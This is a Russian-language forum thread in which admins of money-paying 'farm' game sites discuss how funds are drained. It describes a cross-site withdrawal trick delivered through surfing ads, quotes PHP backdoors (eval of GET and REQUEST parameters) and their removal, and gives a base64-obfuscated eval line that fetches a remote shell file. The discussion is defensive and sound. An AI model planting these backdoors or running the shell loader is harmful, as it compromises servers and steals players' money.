Как уводят деньги с фермы (описание)

  • Автор темы takebet
  • Дата начала
takebet
Участник
Сообщения
25
Реакции
4
Многие новые админы ферм жалуются, что не понятным способом уводят деньги с их игры, при чём массово и на один и тот же номер кошелька.
Это объясняется отсутствием Платёжного пароля в игре и присутствием серфинга сайтов.
Злодей (так назовем взломщика), имеет свой код на своем хостинге, вписывает в этот код свой номер кошелька, сумму вывода и ссылку на сайт где есть серфинг без платежного пароля.
Выглядит ссылка примерно так: "http://sait.ru/account/payment"
Ссылка прямо указывает на страницу вывода.
Затем Злодей свой рекламный текст в серфинг и указывает ссылку на свой сайт, где прячет код с этой ссылкой и кошельком. Сейчас многие админы ставят серфинг с автомодерацией, то есть не нужно производить проверку добавленных объявлений, прежде чем запустить это объявление для просмотра в серфинге. Так вот автоматически объявление Злодея поступает в список серфинга для просмотра другими участниками. Участник кликает по ссылке, но там на секунду появляется окошечко с кошельком Злодея и суммой для вывода, но после этого участник видит открывшуюся страницу вывода с его номером кошелька. И в этот момент происходит автоматическая выплата указанной суммы на кошелек Злодея.
Сумма не большая, рассчитанная на минимальную выплату от 1 рубля и чуть выше может быть. зато много участников просматривая эту ссылку, лишаются заложенной в коде суммы, отсюда и происходит массовые выплаты на один и тот же кошелек, но с разных аккаунтов.
Есть такие Злодеи, что ставят сумму к выводу больше, например 10 рублей (1000 серебра), а когда попадается участник у которого такая сумма имеется на балансе вывода, тогда и происходит выплата Злодею.
Проверял сам на своей игре, после чего везде устанавливаю платёжный пароль.
Даже есть записанное видео в ютубе, его можно найти по поиску: массовый вывод денег с ферм. Или что-то в этом роде.
Защита очень простая и эффективная - установить платёжный пароль, тогда при выплате этот код не сможет обойти платежный пароль и деньги останутся у участников.
 
APTEMOH
Участник
Сообщения
889
Реакции
256
Telegram
APTEMOH
Всем ставлю платежный пароль. :)
 
hyipblocker
Участник
Сообщения
24
Реакции
11
Всё это бред. Не нужно пользоваться гавно-хостингами и ставить паблик движки. А также ставьте мод запоминания кошелька, чтобы пользователь мог его ввести ОДИН раз. Это надёжнее платёжного пароля. Берите VPS, и у вас есть круглосуточный мониторинг.
Через логи можно быстро найти уязвимость. Будь то SQL INJ вы сразу поймете где дыра. По логам это легко палится, просто введите в поиск SELECT/UNION/'/+ и вы поймёте это (если руки от куда надо растут.)
 
pligin
Участник
Сообщения
3.654
Реакции
1.337
hyipblocker написал(а):
Всё это бред. Не нужно пользоваться гавно-хостингами и ставить паблик движки. А также ставьте мод запоминания кошелька, чтобы пользователь мог его ввести ОДИН раз. Это надёжнее платёжного пароля. Берите VPS, и у вас есть круглосуточный мониторинг.
Через логи можно быстро найти уязвимость. Будь то SQL INJ вы сразу поймете где дыра. По логам это легко палится, просто введите в поиск SELECT/UNION/'/+ и вы поймёте это (если руки от куда надо растут.)
Я, кстати, предоставляю услуги по содержанию VPS Виртуальный север VPS на SSD
 
hyipblocker
Участник
Сообщения
24
Реакции
11
pligin
Участник
Сообщения
3.654
Реакции
1.337
hyipblocker написал(а):
Спасибо, но характеристики мне слишком малы. Сейчас я юзаю четырёхядерный с 8 RAM. Так как кроме игры держу ещё много проектов.
у каждого свои потребности... но, мне кажется, это через чур...
 
Жоха
Участник
Сообщения
22
Реакции
0
Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
PHP:
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
  
   eval($_GET['fs']);
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот код
PHP:
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
обязательно удалите этот код
 
pligin
Участник
Сообщения
3.654
Реакции
1.337
Жоха написал(а):
Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
PHP:
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
 
   eval($_GET['fs']);
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот код
PHP:
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
обязательно удалите этот код
в фермах eval() нужно всегда удалять
 
hyipblocker
Участник
Сообщения
24
Реакции
11
admin написал(а):
у каждого свои потребности... но, мне кажется, это через чур...
у меня ещё около 10 проектов ))) я думаю этого даже мало уже))
 
hyipblocker
Участник
Сообщения
24
Реакции
11
  • #10
Жоха написал(а):
Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
PHP:
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
 
   eval($_GET['fs']);
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот код
PHP:
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
обязательно удалите этот код
Вот вы пишите про него, что он так вреден.

А пример иньекции можете показать? Я просто не разбирал ещё движки особо эти. Хотя познания есть
 
pligin
Участник
Сообщения
3.654
Реакции
1.337
  • #11
hyipblocker написал(а):
Вот вы пишите про него, что он так вреден.

А пример иньекции можете показать? Я просто не разбирал ещё движки особо эти. Хотя познания есть
можно почитать eval() и все поймешь
 
hyipblocker
Участник
Сообщения
24
Реакции
11
  • #12
admin написал(а):
можно почитать eval() и все поймешь
Я лишь просил пример, что такое eval(); я знаю, но не сталкивался с дырами в фермах, не знаю даже где искать. у меня по крайней мере в движке его вообще нет
 
pligin
Участник
Сообщения
3.654
Реакции
1.337
  • #13
hyipblocker написал(а):
Я лишь просил пример, что такое eval(); я знаю, но не сталкивался с дырами в фермах, не знаю даже где искать. у меня по крайней мере в движке его вообще нет
Код:
$string = ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=;
eval(base64_decode($string));
Код:
eval(base64_decode(ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=));
 
hyipblocker
Участник
Сообщения
24
Реакции
11
  • #14
admin написал(а):
Код:
$string = ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=;
eval(base64_decode($string));
Код:
eval(base64_decode(ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=));
А ну так конечно, через base64 хоть шелл зашифровать можно. Благо дело что всё это легко расшифровать в отличии от Zend.
 
pligin
Участник
Сообщения
3.654
Реакции
1.337
  • #15
Сверху